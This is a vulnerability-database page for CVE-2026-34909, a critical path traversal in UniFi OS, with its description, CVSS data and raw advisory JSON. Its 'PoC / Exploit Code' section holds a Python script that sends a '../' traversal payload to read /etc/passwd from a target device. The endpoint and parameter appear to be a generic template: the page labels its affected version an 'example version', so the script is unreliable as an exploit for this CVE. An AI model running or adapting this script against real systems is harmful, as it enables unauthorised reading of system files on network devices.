Security Vulnerability Report
CVE-2026-34909 CVSS 10.0 CRITICAL

CVE-2026-34909

Published: 2026-05-22 02:16:34
Last Modified: 2026-05-22 02:16:34

Description

A malicious actor with access to the network could exploit a Path Traversal vulnerability found in UniFi OS devices to access files on the underlying system that could be manipulated to access an underlying account.

CVSS Details

CVSS Score
10.0
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

UniFi OS < 4.0.0 (example version; refer to the official advisory)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Target URL of the vulnerable UniFi OS device
target_url = "https://<target-ip>/api/status"

# Malicious payload utilizing path traversal to read /etc/passwd
# Attempting to escape the web root
traversal_payload = "?file=../../../../../../../../etc/passwd"

headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
}

try:
    # Send the malicious request
    response = requests.get(target_url + traversal_payload, headers=headers, verify=False, timeout=10)

    # Check if the response contains root user entry indicating successful exploitation
    if response.status_code == 200 and "root:x:0:0" in response.text:
        print("[+] Vulnerability Exploited Successfully!")
        print("[+] Content of /etc/passwd:")
        print(response.text)
    else:
        print("[-] Exploit failed or target is patched.")
        print("Status Code:", response.status_code)
except requests.exceptions.RequestException as e:
    print(f"[!] Error connecting to target: {e}")
```

References

https://community.ui.com/releases/Security-Advisory-Bulletin-064-064/84811c09-4cf4-42ab-bd61-cc994445963b (vendor advisory; weakness classified as CWE-22)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-34909",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-22T02:16:34.390",
    "lastModified": "2026-05-22T02:16:34.390",
    "vulnStatus": "Received",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A malicious actor with access to the network could exploit a Path Traversal vulnerability found in UniFi OS devices to access files on the underlying system that could be manipulated to access an underlying account."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
            "baseScore": 10.0,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 6.0
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-22"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://community.ui.com/releases/Security-Advisory-Bulletin-064-064/84811c09-4cf4-42ab-bd61-cc994445963b",
        "source": "[email protected]"
      }
    ]
  }
}
```